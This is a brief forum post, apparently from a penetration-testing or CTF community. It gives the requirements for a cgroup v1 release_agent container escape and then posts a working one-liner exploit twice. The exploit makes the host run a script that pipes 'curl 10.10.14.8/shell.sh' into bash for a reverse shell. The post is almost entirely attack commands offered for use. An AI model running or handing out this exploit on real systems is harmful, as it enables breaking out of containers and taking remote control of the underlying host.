Search
Member List
Calendar
Help
Requirements to use this technique, the container must run with the --privliged flag. You must be running as root inside the container. The container must be run with the SYS_ADMIN Linux capability. The container must lack an AppArmor profile or otherwise allow the mount syscall. The cgroup v1 virtual filesystem must be mounted read-write inside the container.
root@container:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@container:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@container:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@container:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/shell.sh | bash' >/c; #Curl for a reverse shell with netcat listening
root@container:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
-Greyhound
root@container:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@container:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@container:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@container:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/shell.sh | bash' >/c; #Curl for a reverse shell with netcat listening
root@container:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
-Greyhound
just some guy